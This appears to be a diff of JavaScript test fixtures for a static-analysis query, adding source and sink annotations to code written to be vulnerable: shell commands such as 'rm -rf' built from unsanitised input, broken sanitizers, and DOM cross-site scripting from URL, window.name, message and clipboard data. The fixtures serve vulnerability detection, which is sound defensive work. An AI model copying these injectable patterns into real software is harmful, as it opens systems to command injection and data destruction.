static foo(name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
bar(name) {
cp.exec("rm -rf " + name); // $ Alert
bar(name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
cp.exec("rm -rf " + notASource);
}
@@ -46,41 +46,41 @@ class Cla3 {
module.exports.cla3 = Cla3;
module.exports.mz = function (name) {
require("mz/child_process").exec("rm -rf " + name); // $ Alert
module.exports.mz = function (name) { // $ Source
require("mz/child_process").exec("rm -rf " + name); // $ Alert Sink
}
module.exports.flow = function (name) {
var cmd1 = "rm -rf " + name; // $ Alert
module.exports.flow = function (name) { // $ Source
var cmd1 = "rm -rf " + name; // $ Alert Sink
cp.exec(cmd1);
var cmd2 = "rm -rf " + name; // $ Alert
var cmd2 = "rm -rf " + name; // $ Alert Sink
function myExec(cmd) {
cp.exec(cmd);
}
myExec(cmd2);
}
module.exports.stringConcat = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.stringConcat = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
cp.exec(name);
cp.exec("for foo in (" + name + ") do bla end"); // $ Alert
cp.exec("for foo in (" + name + ") do bla end"); // $ Alert Sink
cp.exec("cat /foO/BAR/" + name) // $ Alert
cp.exec("cat /foO/BAR/" + name) // $ Alert Sink
cp.exec("cat \"" + name + "\"") // $ Alert
cp.exec("cat \"" + name + "\"") // $ Alert Sink
cp.exec("cat '" + name + "'") // $ Alert
cp.exec("cat '" + name + "'") // $ Alert Sink
cp.exec("cat '/foo/bar" + name + "'") // $ Alert
cp.exec("cat '/foo/bar" + name + "'") // $ Alert Sink
cp.exec(name + " some file")
}
module.exports.arrays = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.arrays = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
var args1 = ["node"];
args1.push(name); // $ Alert
@@ -94,7 +94,7 @@ module.exports.arrays = function (name) {
}
var util = require("util");
module.exports.format = function (name) {
module.exports.format = function (name) { // $ Source
cp.exec(util.format("rm -rf %s", name)); // $ Alert
cp.exec(util.format("rm -rf '%s'", name)); // $ Alert
@@ -108,8 +108,8 @@ module.exports.format = function (name) {
cp.exec(require("printf")('rm -rf %s', name)); // $ Alert
}
module.exports.valid = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.valid = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!isValidName(name)) {
return;
@@ -117,8 +117,8 @@ module.exports.valid = function (name) {
cp.exec("rm -rf " + name);
}
module.exports.safe = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.safe = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!isSafeName(name)) {
return;
@@ -127,8 +127,8 @@ module.exports.safe = function (name) {
}
class Cla4 {
wha(name) {
cp.exec("rm -rf " + name); // $ Alert
wha(name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
}
static bla(name) {
@@ -145,20 +145,20 @@ function Cla5(name) {
}
module.exports.cla5 = new Cla5();
module.exports.indirect = function (name) {
let cmd = "rm -rf " + name; // $ Alert
module.exports.indirect = function (name) { // $ Source
let cmd = "rm -rf " + name; // $ Alert Sink
let sh = "sh";
let args = ["-c", cmd];
cp.spawn(sh, args, cb);
}
module.exports.indirect2 = function (name) {
module.exports.indirect2 = function (name) { // $ Source
let cmd = name;
let sh = "sh";
let args = ["-c", cmd];
cp.spawn(sh, args, cb);
let cmd2 = "rm -rf " + name; // $ Alert
let cmd2 = "rm -rf " + name; // $ Alert Sink
var args2 = [cmd2];
cp.spawn(
'cmd.exe',
@@ -167,65 +167,65 @@ module.exports.indirect2 = function (name) {
);
}
module.exports.cmd = function (command, name) {
module.exports.cmd = function (command, name) { // $ Source
cp.exec("fo | " + command);
cp.exec("fo | " + name); // $ Alert
cp.exec("fo | " + name); // $ Alert Sink
}
module.exports.sanitizer = function (name) {
module.exports.sanitizer = function (name) { // $ Source
var sanitized = "'" + name.replace(/'/g, "'\\''") + "'"
cp.exec("rm -rf " + sanitized);
var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert
cp.exec("rm -rf " + broken); // $ Alert
var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert Sink
cp.exec("rm -rf " + broken); // $ Alert Sink
}
var path = require("path");
module.exports.guard = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.guard = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!path.exist(name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
return;
}
cp.exec("rm -rf " + name);
}
module.exports.blacklistOfChars = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.blacklistOfChars = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (/[^A-Za-z0-9_\/:=-]/.test(name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
}
module.exports.whitelistOfChars = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.whitelistOfChars = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (/^[A-Za-z0-9_\/:=-]$/.test(name)) {
cp.exec("rm -rf " + name);
} else {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
}
module.exports.blackList2 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.blackList2 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!/^([a-zA-Z0-9]+))?$/.test(name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
process.exit(-1);
}
cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`.
cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to tracking flow through `process.exit()`.
}
module.exports.accessSync = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.accessSync = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
try {
path.accessSync(name);
@@ -233,7 +233,7 @@ module.exports.accessSync = function (name) {
return;
}
cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer.
cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer.
}
var cleanInput = function (s) {
@@ -245,27 +245,27 @@ var cleanInput = function (s) {
return s;
}
module.exports.goodSanitizer = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.goodSanitizer = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
var cleaned = cleanInput(name);
cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node.
cp.exec("rm -rf " + cleaned); // $ Sink SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node.
}
var fs = require("fs");
module.exports.guard2 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.guard2 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (!fs.existsSync("prefix/" + name)) {
cp.exec("rm -rf prefix/" + name); // $ Alert
cp.exec("rm -rf prefix/" + name); // $ Alert Sink
return;
}
cp.exec("rm -rf prefix/" + name);
}
module.exports.sanitizerProperty = function (obj) {
cp.exec("rm -rf " + obj.version); // $ Alert
module.exports.sanitizerProperty = function (obj) { // $ Source
cp.exec("rm -rf " + obj.version); // $ Alert Sink
obj.version = "";
@@ -273,12 +273,12 @@ module.exports.sanitizerProperty = function (obj) {
}
module.exports.Foo = class Foo {
start(opts) {
cp.exec("rm -rf " + opts.bla); // $ Alert
start(opts) { // $ Source
cp.exec("rm -rf " + opts.bla); // $ Alert Sink
this.opts = {};
this.opts.bla = opts.bla
cp.exec("rm -rf " + this.opts.bla); // $ Alert
cp.exec("rm -rf " + this.opts.bla); // $ Alert Sink
}
}
@@ -304,25 +304,25 @@ function sanitizeShellString(str) {
return result
}
module.exports.sanitizer2 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.sanitizer2 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
var sanitized = sanitizeShellString(name);
cp.exec("rm -rf " + sanitized);
}
module.exports.typeofcheck = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.typeofcheck = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (typeof name === "undefined") {
cp.exec("rm -rf " + name);
} else {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
}
module.exports.typeofcheck = function (arg) {
var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert
module.exports.typeofcheck = function (arg) { // $ Source
var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert Sink
cp.exec(cmd);
}
@@ -336,8 +336,8 @@ module.exports.unproblematic = function() {
cp.exec("rm -rf " + id("test"));
};
module.exports.problematic = function(n) {
cp.exec("rm -rf " + id(n)); // $ Alert
module.exports.problematic = function(n) { // $ Source
cp.exec("rm -rf " + id(n)); // $ Alert Sink
};
module.exports.typeofNumber = function(n) {
@@ -346,9 +346,9 @@ module.exports.typeofNumber = function(n) {
}
};
function boundProblem(safe, unsafe) {
function boundProblem(safe, unsafe) { // $ Source
cp.exec("rm -rf " + safe);
cp.exec("rm -rf " + unsafe); // $ Alert
cp.exec("rm -rf " + unsafe); // $ Alert Sink
}
Object.defineProperty(module.exports, "boundProblem", {
@@ -402,8 +402,8 @@ function yetAnohterSanitizer(str) {
return result;
}
module.exports.sanitizer3 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.sanitizer3 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
var sanitized = yetAnohterSanitizer(name);
cp.exec("rm -rf " + sanitized);
@@ -411,8 +411,8 @@ module.exports.sanitizer3 = function (name) {
const cp = require("child_process");
const spawn = cp.spawn;
module.exports.shellOption = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.shellOption = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert
cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert
@@ -438,13 +438,13 @@ function build(first, last) {
};
var asyncExec = require("async-execute");
module.exports.asyncStuff = function (name) {
asyncExec("rm -rf " + name); // $ Alert
module.exports.asyncStuff = function (name) { // $ Source
asyncExec("rm -rf " + name); // $ Alert Sink
}
const myFuncs = {
myFunc: function (name) {
asyncExec("rm -rf " + name); // $ Alert
myFunc: function (name) { // $ Source
asyncExec("rm -rf " + name); // $ Alert Sink
}
};
@@ -474,13 +474,13 @@ const {promisify} = require('util');
const exec = promisify(require('child_process').exec);
module.exports.check = function check(config) {
module.exports.check = function check(config) { // $ Source
const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert
return exec(cmd);
}
module.exports.splitConcat = function (name) {
let args = ' my name is ' + name; // $ Alert
module.exports.splitConcat = function (name) { // $ Source
let args = ' my name is ' + name; // $ Alert Sink
let cmd = 'echo';
cp.exec(cmd + args);
}
@@ -495,8 +495,8 @@ module.exports.myCommand = function (myCommand) {
cp: require('child_process')
};
module.exports.myIndirectThing = function (name) {
MyThing.cp.exec("rm -rf " + name); // $ Alert
module.exports.myIndirectThing = function (name) { // $ Source
MyThing.cp.exec("rm -rf " + name); // $ Alert Sink
}
});
@@ -506,48 +506,48 @@ for (var name in imp){
module.exports[name] = imp[name];
}
module.exports.sanitizer4 = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.sanitizer4 = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (isNaN(name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(parseInt(name))) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(+name)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(parseInt(name, 10))) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(name - 0)) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name);
}
if (isNaN(name | 0)) { // <- not a sanitizer
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
} else {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
}
module.exports.shellThing = function (name) {
module.exports.shellThing = function (name) { // $ Source
function indirectShell(cmd, args, spawnOpts) {
cp.spawn(cmd, args, spawnOpts); // $ Alert
}
@@ -555,28 +555,28 @@ module.exports.shellThing = function (name) {
indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert
}
module.exports.badSanitizer = function (name) {
module.exports.badSanitizer = function (name) { // $ Source
if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer
exec("rm -rf " + name); // $ Alert
exec("rm -rf " + name); // $ Alert Sink
} else {
exec("rm -rf " + name); // $ Alert
exec("rm -rf " + name); // $ Alert Sink
}
if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer
exec("rm -rf " + name); // $ Alert
exec("rm -rf " + name); // $ Alert Sink
} else {
exec("rm -rf " + name);
}
}
module.exports.safeWithBool = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.safeWithBool = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (isSafeName(name)) {
cp.exec("rm -rf " + name);
}
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
if (isSafeName(name) === true) {
cp.exec("rm -rf " + name);
@@ -587,10 +587,10 @@ module.exports.safeWithBool = function (name) {
}
if (isSafeName(name) == false) {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
function indirectThing(name) {
@@ -605,8 +605,8 @@ function moreIndirect(name) {
return indirectThing2(name) !== false;
}
module.exports.veryIndeirect = function (name) {
cp.exec("rm -rf " + name); // $ Alert
module.exports.veryIndeirect = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink
if (indirectThing(name)) {
cp.exec("rm -rf " + name);
@@ -623,15 +623,15 @@ module.exports.veryIndeirect = function (name) {
if (moreIndirect(name) !== false) {
cp.exec("rm -rf " + name);
} else {
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
cp.exec("rm -rf " + name); // $ Alert
cp.exec("rm -rf " + name); // $ Alert Sink
}
module.exports.sanitizer = function (name) {
var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert
cp.exec("rm -rf " + sanitized); // $ Alert
module.exports.sanitizer = function (name) { // $ Source
var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert Sink
cp.exec("rm -rf " + sanitized); // $ Alert Sink
var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'"
cp.exec("rm -rf " + sanitized);


@@ -1,9 +1,9 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - is imported from main module.
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module.
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // $ Alert - is imported from main module.
module.exports.foo = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module.
};


@@ -1,5 +1,5 @@
const cp = require("child_process");
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js`
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - this function is exported from `amd.js`
};


@@ -1,15 +1,15 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged.
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged.
};
module.exports.foo = function (name) {
cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js
module.exports.foo = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - this is being called explicitly from child_process-test.js
};
module.exports.amd = require("./amd.js");
module.exports.arrToShell = function (cmd, arr) {
module.exports.arrToShell = function (cmd, arr) { // $ Source
cp.spawn("echo", arr, {shell: true}); // $ Alert
}
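Review bot: The `arrToShell` sink line `cp.spawn("echo", arr, {shell: true}); // $ Alert` carries no `Sink` tag, while the two `cp.exec` sinks above it in this file are tagged `$ Alert Sink`, and the same pattern appears on the other `{shell: true}` spawn/execFile calls earlier in the commit. If the test query deliberately reports the sink of the shell-option model on a node other than the alert location, a short comment on that line would keep the next reader from treating it as a missed tag; if not, the line should read `cp.spawn("echo", arr, {shell: true}); // $ Alert Sink`. Since these expectations look like accepted actual output, the absent tag may be exactly what the query emits, which is worth confirming before changing it.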


@@ -1,5 +1,5 @@
var cp = require("child_process")
export default function (name) {
cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file.
export default function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file.
}


@@ -1,5 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file.
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file.
};


@@ -1,5 +1,5 @@
var cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged.
module.exports = function (name) { // $ Source
cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged.
};


@@ -3,6 +3,6 @@ const dispatch = {
POST: require("./subsub"),
};
module.exports.foo = function (name, type) {
module.exports.foo = function (name, type) { // $ Source
dispatch[type](name);
};


@@ -1,5 +1,5 @@
const cp = require("child_process")
module.exports = function (name) {
cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged.
cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged.
};


@@ -1,13 +1,13 @@
this.addEventListener('message', function(event) {
this.addEventListener('message', function(event) { // $ Source
document.write(event.data); // $ Alert
})
this.addEventListener('message', function({data}) {
this.addEventListener('message', function({data}) { // $ Source
document.write(data); // $ Alert
})
function test() {
function foo(x, event, y) {
function foo(x, event, y) { // $ Source
document.write(x.data);
document.write(event.data); // $ Alert
document.write(y.data);


@@ -10,6 +10,6 @@ angular.module('myApp', [])
}
});
addEventListener('message', (ev) => {
addEventListener('message', (ev) => { // $ Source
Cookie.set("unsafe", ev.data);
});


@@ -7,7 +7,7 @@ function main() {
document.body.innerHTML = `<span class="${classNames(window.name)}">Hello<span>`; // $ Alert
document.body.innerHTML = `<span class="${classNamesD(window.name)}">Hello<span>`; // $ Alert
document.body.innerHTML = `<span class="${classNamesB(window.name)}">Hello<span>`; // $ Alert
let unsafeStyle = classNames.bind({foo: window.name});
let unsafeStyle = classNames.bind({foo: window.name}); // $ Source
document.body.innerHTML = `<span class="${unsafeStyle('foo')}">Hello<span>`; // $ Alert
let safeStyle = classNames.bind({});
document.body.innerHTML = `<span class="${safeStyle(window.name)}">Hello<span>`; // $ Alert


@@ -5,7 +5,7 @@ function paste(e) {
if (!clipboardData) return;
const text = clipboardData.getData('text/plain');
const html = clipboardData.getData('text/html');
const html = clipboardData.getData('text/html'); // $ Source
if (!text && !html) return;
e.preventDefault();
@@ -40,7 +40,7 @@ $("#foo").bind('paste', (e) => {
if (!clipboardData) return;
const text = clipboardData.getData('text/plain');
const html = clipboardData.getData('text/html');
const html = clipboardData.getData('text/html'); // $ Source
if (!text && !html) return;
e.preventDefault();
@@ -68,7 +68,7 @@ async function getClipboardData(e: ClipboardEvent): Promise<Array<File | string>
}
if (e.clipboardData.types.includes('text/html')) {
const droppedHtml = e.clipboardData.getData('text/html');
const droppedHtml = e.clipboardData.getData('text/html'); // $ Source
const container = document.createElement('html');
container.innerHTML = droppedHtml; // $ Alert
const imgs = container.getElementsByTagName('img');
@@ -95,7 +95,7 @@ async function getClipboardData(e: ClipboardEvent): Promise<Array<File | string>
const { data, inputType, isComposing, dataTransfer } = e;
if (!dataTransfer) return;
const html = dataTransfer.getData('text/html');
const html = dataTransfer.getData('text/html'); // $ Source
$("#id").html(html); // $ Alert
});
})();


@@ -1,7 +1,7 @@
const d3 = require('d3');
function getTaint() {
return window.name;
return window.name; // $ Source
}
function doSomething() {


@@ -6,7 +6,7 @@ import dateformat from 'dateformat';
function main() {
let time = new Date();
let taint = decodeURIComponent(window.location.hash.substring(1));
let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source
document.body.innerHTML = `Time is ${dateFns.format(time, taint)}`; // $ Alert
document.body.innerHTML = `Time is ${dateFnsEsm.format(time, taint)}`; // $ Alert
@@ -27,7 +27,7 @@ import MomentAdapter from "@date-io/moment";
import DayJSAdapter from "@date-io/dayjs"
function dateio() {
let taint = decodeURIComponent(window.location.hash.substring(1));
let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source
const dateFns = new DateFnsAdapter();
const luxon = new LuxonAdapter();
@@ -43,7 +43,7 @@ function dateio() {
import { DateTime } from "luxon";
function luxon() {
let taint = decodeURIComponent(window.location.hash.substring(1));
let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source
document.body.innerHTML = `Time is ${DateTime.now().plus({years: 1}).toFormat(taint)}`; // $ Alert
document.body.innerHTML = `Time is ${new DateTime().setLocale('fr').toFormat(taint)}`; // $ Alert
@@ -51,7 +51,7 @@ function luxon() {
}
function dateio2() {
let taint = decodeURIComponent(window.location.hash.substring(1));
let taint = decodeURIComponent(window.location.hash.substring(1)); // $ Source
const moment = new MomentAdapter();
document.body.innerHTML = `Time is ${moment.addDays(moment.date("2020-06-21"), 1).format(taint)}`; // $ Alert


@@ -5,7 +5,7 @@ function drop(e) {
if (!dataTransfer) return;
const text = dataTransfer.getData('text/plain');
const html = dataTransfer.getData('text/html');
const html = dataTransfer.getData('text/html'); // $ Source
if (!text && !html) return;
e.preventDefault();
@@ -40,7 +40,7 @@ $("#foo").bind('drop', (e) => {
if (!dataTransfer) return;
const text = dataTransfer.getData('text/plain');
const html = dataTransfer.getData('text/html');
const html = dataTransfer.getData('text/html'); // $ Source
if (!text && !html) return;
e.preventDefault();
@@ -68,7 +68,7 @@ async function getDropData(e: DragEvent): Promise<Array<File | string>> {
}
if (e.dataTransfer.types.includes('text/html')) {
const droppedHtml = e.dataTransfer.getData('text/html');
const droppedHtml = e.dataTransfer.getData('text/html'); // $ Source
const container = document.createElement('html');
container.innerHTML = droppedHtml; // $ Alert
const imgs = container.getElementsByTagName('img');


@@ -1,5 +1,5 @@
function test() {
var tainted = document.location.search
var tainted = document.location.search // $ Source
$(tainted); // OK - location.search starts with '?'
$("body", tainted);
@@ -15,7 +15,7 @@ function test() {
elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert
elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert
let hash = window.location.hash;
let hash = window.location.hash; // $ Source
$(hash); // OK - start with '#'
$(hash.substring(1)); // $ Alert


@@ -2,7 +2,7 @@ var express = require("express");
var app = express();
app.get("/some/path", function (req, res) {
const locale = req.param("locale");
const locale = req.param("locale"); // $ Source
const breadcrumbList = [
{
"@type": "ListItem",


@@ -4,7 +4,7 @@ import jwt from "jsonwebtoken";
import { JSDOM } from "jsdom";
app.get('/some/path', function (req, res) {
var taint = req.param("wobble");
var taint = req.param("wobble"); // $ Source
jwt.verify(taint, 'my-secret-key', function (err, decoded) {
new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert


@@ -1,5 +1,5 @@
function test() {
var target = document.location.search
var target = document.location.search // $ Source
$('myId').html(sanitize ? DOMPurify.sanitize(target) : target);
@@ -23,7 +23,7 @@ function test() {
}
function badSanitizer() {
var target = document.location.search
var target = document.location.search // $ Source
function sanitizeBad(x) {
return x; // No sanitization;


@@ -2,7 +2,7 @@ import { useRouter } from 'next/router'
export default function Post(params) {
const router = useRouter()
const { id } = router.query
const { id } = router.query // $ Source
return (
<>
@@ -22,8 +22,8 @@ export default function Post(params) {
export async function getServerSideProps(context) {
return {
props: {
id: context.params.id || "",
q: context.query?.foobar || "",
id: context.params.id || "", // $ Source
q: context.query?.foobar || "", // $ Source
}
}
}


@@ -4,7 +4,7 @@ import { WebView } from 'react-native';
var app = express();
app.get('/some/path', function(req, res) {
let tainted = req.param("code");
let tainted = req.param("code"); // $ Source
<WebView html={tainted}/>; // $ Alert
<WebView source={{html: tainted}}/>; // $ Alert
});


@@ -1,19 +1,19 @@
import { useState } from 'react';
function initialState() {
let [state, setState] = useState(window.name);
let [state, setState] = useState(window.name); // $ Source
return <div dangerouslySetInnerHTML={{__html: state}}></div>; // $ Alert
}
function setStateValue() {
let [state, setState] = useState('foo');
setState(window.name);
setState(window.name); // $ Source
return <div dangerouslySetInnerHTML={{__html: state}}></div>; // $ Alert
}
function setStateValueLazy() {
let [state, setState] = useState('foo');
setState(() => window.name);
setState(() => window.name); // $ Source
return <div dangerouslySetInnerHTML={{__html: state}}></div>; // $ Alert
}
@@ -22,7 +22,7 @@ function setStateValueLazy() {
setState(prev => {
document.body.innerHTML = prev; // $ Alert
})
setState(() => window.name);
setState(() => window.name); // $ Source
}
function setStateValueSafe() {


@@ -13,7 +13,7 @@ function escapeAttr(s) {
}
function test() {
var tainted = window.name;
var tainted = window.name; // $ Source
var elt = document.createElement();
elt.innerHTML = "<a href=\"" + escapeAttr(tainted) + "\">" + escapeHtml(tainted) + "</a>";
elt.innerHTML = "<div>" + escapeAttr(tainted) + "</div>"; // $ MISSING: Alert - not flagged -


@@ -1,6 +1,6 @@
(function() {
sessionStorage.setItem('session', document.location.search);
localStorage.setItem('local', document.location.search);
sessionStorage.setItem('session', document.location.search); // $ Source
localStorage.setItem('local', document.location.search); // $ Source
$('myId').html(sessionStorage.getItem('session')); // $ Alert
$('myId').html(localStorage.getItem('session'));


@@ -8,6 +8,6 @@ function foo(x, y, z) {
}
function bar() {
const url = window.location.href;
const url = window.location.href; // $ Source
foo('safe', url, 'safe');
}


@@ -3,7 +3,7 @@ import ReactDOM from 'react-dom';
import ReactTooltip from 'react-tooltip';
function tooltips() {
const source = window.name;
const source = window.name; // $ Source
return <span>
<span data-tip={source}/>
<span data-tip={source} data-html={false} />
@@ -19,6 +19,6 @@ function MyElement(props) {
}
function useMyElement() {
const source = window.name;
const source = window.name; // $ Source
return <MyElement provide={() => source} />;
}


@@ -3,7 +3,7 @@
"own goal": "backpass",
"fumble": "feint"
};
var target = document.location.search
var target = document.location.search // $ Source
var searchParams = new URLSearchParams(target.substring(1));
$('original-term').html(searchParams.get('term')); // $ Alert


@@ -1,7 +1,7 @@
import * as lib from './trusted-types-lib';
const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert
policy1.createHTML(window.name);
policy1.createHTML(window.name); // $ Source
const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' });
policy2.createHTML(window.name);
@@ -10,4 +10,4 @@ const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x });
policy3.createHTML('safe');
const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml });
policy4.createHTML(window.name);
policy4.createHTML(window.name); // $ Source


@@ -1,5 +1,5 @@
function test() {
var target = document.location.search
var target = document.location.search // $ Source
$('myId').html(target) // $ Alert
@@ -11,7 +11,7 @@ function test() {
$('<div style="width:' + +target + 'px">');
$('<div style="width:' + parseInt(target) + 'px">');
let params = (new URL(document.location)).searchParams;
let params = (new URL(document.location)).searchParams; // $ Source
$('name').html(params.get('name')); // $ Alert
var searchParams = new URLSearchParams(target.substring(1));
@@ -21,10 +21,10 @@ function test() {
function foo(target) {
$('myId').html(target); // $ Alert
}
foo(document.location.search);
foo(document.location.search); // $ Source
function bar() {
return document.location.search;
return document.location.search; // $ Source
}
$('myId').html(bar()); // $ Alert
@@ -50,12 +50,12 @@ $('myId').html(wrap(chop(bar()))); // $ Alert
function dangerouslySetInnerHtml(s) {
$('myId').html(s); // $ Alert
}
dangerouslySetInnerHtml(document.location.search);
dangerouslySetInnerHtml(document.location.search);
dangerouslySetInnerHtml(document.location.search); // $ Source
dangerouslySetInnerHtml(document.location.search); // $ Source
$('myId').html(bar()); // $ Alert
[,document.location.search].forEach(function(x) {
[,document.location.search].forEach(function(x) { // $ Source
if (x)
$('myId').html(x); // $ Alert
});
@@ -90,7 +90,7 @@ angular.module('myApp', [])
})
function tst() {
var v = document.location.search.substr(1);
var v = document.location.search.substr(1); // $ Source
document.write(v); // $ Alert
@@ -129,7 +129,7 @@ function tst() {
function angularJSServices() {
angular.module('myApp', [])
.factory("xssSource_to_service", ["xssSinkService1", function(xssSinkService1) {
xssSinkService1(window.location.search);
xssSinkService1(window.location.search); // $ Source
}])
.factory("xssSinkService1", function(){
return function(v){ $("<div>").html(v); } // $ Alert
@@ -139,7 +139,7 @@ function angularJSServices() {
$("<div>").html(xssSourceService()); // $ Alert
}])
.factory("xssSourceService", function(){
return function() { return window.location.search };
